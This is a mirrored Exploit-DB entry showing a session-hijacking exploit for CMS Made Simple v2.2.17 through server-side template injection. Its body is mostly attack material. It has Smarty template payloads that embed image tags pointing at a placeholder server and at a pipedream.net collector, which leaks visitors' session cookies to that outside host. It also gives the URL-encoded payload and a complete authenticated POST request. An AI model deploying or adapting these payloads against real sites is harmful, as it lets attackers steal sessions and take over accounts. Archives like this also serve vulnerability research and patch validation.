bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/51599.txt
Exploit-DB 3a3c03321c DB: 2023-07-20 
18 changes to exploits/shellcodes/ghdb

Hikvision Hybrid SAN Ds-a71024 Firmware - Multiple Remote Code Execution

ABB FlowX v4.00 - Exposure of Sensitive Information

TP-Link TL-WR740N - Authenticated Directory Transversal

Microsoft Edge 114.0.1823.67 (64-bit) - Information Disclosure

Backdrop Cms v1.25.1 - Stored Cross-Site Scripting (XSS)
Blackcat Cms v1.4 - Remote Code Execution (RCE)
Blackcat Cms v1.4 - Stored XSS
CmsMadeSimple v2.2.17 - Remote Code Execution (RCE)
CmsMadeSimple v2.2.17 - session hijacking via Server-Side Template Injection (SSTI)
CmsMadeSimple v2.2.17 - Stored Cross-Site Scripting (XSS)

Joomla! com_booking component 2.4.9 - Information Leak (Account enumeration)

Online Piggery Management System v1.0 - unauthenticated file upload vulnerability

phpfm v1.7.9 - Authentication type juggling

PimpMyLog v1.7.14 - Improper access control

PMB 7.4.6 - SQL Injection

Statamic 4.7.0 - File-Inclusion

Vaidya-Mitra 1.0 - Multiple SQLi
2023-07-20 00:16:46 +00:00

60 lines
No EOL
3.4 KiB
Text
Raw Blame History

#Exploit Title: CmsMadeSimple v2.2.17 - session hijacking via Server-Side Template Injection (SSTI)
#Application: CmsMadeSimple
#Version: v2.2.17
#Bugs: SSTI
#Technology: PHP
#Vendor URL: https://www.cmsmadesimple.org/
#Software Link: https://www.cmsmadesimple.org/downloads/cmsms
#Date of found: 13-07-2023
#Author: Mirabbas Ağalarov
#Tested on: Linux
2. Technical Details & POC
========================================
Steps:
1. Login to test user account
2. Go to Content Manager
3. Add New Content
4. set as
'''
{$smarty.version}
{{7*7}}
{$smarty.now}
{$smarty.template}
<img src=YOU-SERVER/{$smarty.cookies.CMSSESSID852a6e69ca02}>
<img src=YOU-SERVER/{$smarty.cookies.34a3083b62a225efa0bc6b5b43335d226264c2c1}>
<img src=YOU_SERVER/{$smarty.cookies.__c}>
'''
to conten_en section.
5.If any user visit to page, Hacker hijack all cookie
payload: %3Cp%3E%7B%24smarty.version%7D+%7B%7B7*7%7D%7D+%7B%24smarty.now%7D+%7B%24smarty.template%7D+%3Cimg+src%3D%22https%3A%2F%2Fen3uw3qy2e0zs.x.pipedream.net%2F%7B%24smarty.cookies.CMSSESSID852a6e69ca02%7D%22+%2F%3E+%3Cimg+src%3D%22https%3A%2F%2Fen3uw3qy2e0zs.x.pipedream.net%2F%7B%24smarty.cookies.34a3083b62a225efa0bc6b5b43335d226264c2c1%7D%22+%2F%3E+%3Cimg+src%3D%22https%3A%2F%2Fen3uw3qy2e0zs.x.pipedream.net%2F%7B%24smarty.cookies.__c%7D%22+%2F%3E%3C%2Fp%3E
POC Request
POST /admin/moduleinterface.php?mact=CMSContentManager,m1_,admin_editcontent,0&;__c=1c2c31a1c1bff4819cd&;m1_content_id=81&showtemplate=false HTTP/1.1
Host: localhost
Content-Length: 988
sec-ch-ua:
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
sec-ch-ua-platform: ""
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: CMSSESSID852a6e69ca02=bq83g023otkn4s745acdnvbnu4; 34a3083b62a225efa0bc6b5b43335d226264c2c1=1e91865ac5c59e34f8dc1ddb6fd168a61246751d%3A%3AeyJ1aWQiOjEsInVzZXJuYW1lIjoiYWRtaW4iLCJlZmZfdWlkIjoyLCJlZmZfdXNlcm5hbWUiOiJ0ZXN0IiwiaGFzaCI6IiQyeSQxMCRDQlwvWEIyNEpsWmhJNjhKQ29LcWplZXgyOUVXRDRGN2E1MTNIdUo2c3VXMUd1V3NKRTBNcEMifQ%3D%3D; __c=1c2c31a1c1bff4819cd
Connection: close
mact=CMSContentManager%2Cm1_%2Cadmin_editcontent%2C0&__c=1c2c31a1c1bff4819cd&m1_content_id=81&m1_active_tab=&m1_content_type=content&title=test&content_en=%3Cp%3E%7B%24smarty.version%7D+%7B%7B7*7%7D%7D+%7B%24smarty.now%7D+%7B%24smarty.template%7D+%3Cimg+src%3D%22https%3A%2F%2Fen3uw3qy2e0zs.x.pipedream.net%2F%7B%24smarty.cookies.CMSSESSID852a6e69ca02%7D%22+%2F%3E+%3Cimg+src%3D%22https%3A%2F%2Fen3uw3qy2e0zs.x.pipedream.net%2F%7B%24smarty.cookies.34a3083b62a225efa0bc6b5b43335d226264c2c1%7D%22+%2F%3E+%3Cimg+src%3D%22https%3A%2F%2Fen3uw3qy2e0zs.x.pipedream.net%2F%7B%24smarty.cookies.__c%7D%22+%2F%3E%3C%2Fp%3E&menutext=test&parent_id=-1&showinmenu=0&showinmenu=1&titleattribute=&accesskey=&tabindex=&target=---&metadata=&pagedata=&design_id=2&template_id=10&alias=test&active=0&active=1&secure=0&cachable=0&cachable=1&image=&thumbnail=&extra1=&extra2=&extra3=&wantschildren=0&wantschildren=1&searchable=0&searchable=1&disable_wysiwyg=0&ownerid=1&additional_editors=&m1_ajax=1&m1_apply=1
Poc Video: https://youtu.be/zq3u3jRpfqM
Reference in a new issue View git blame Copy permalink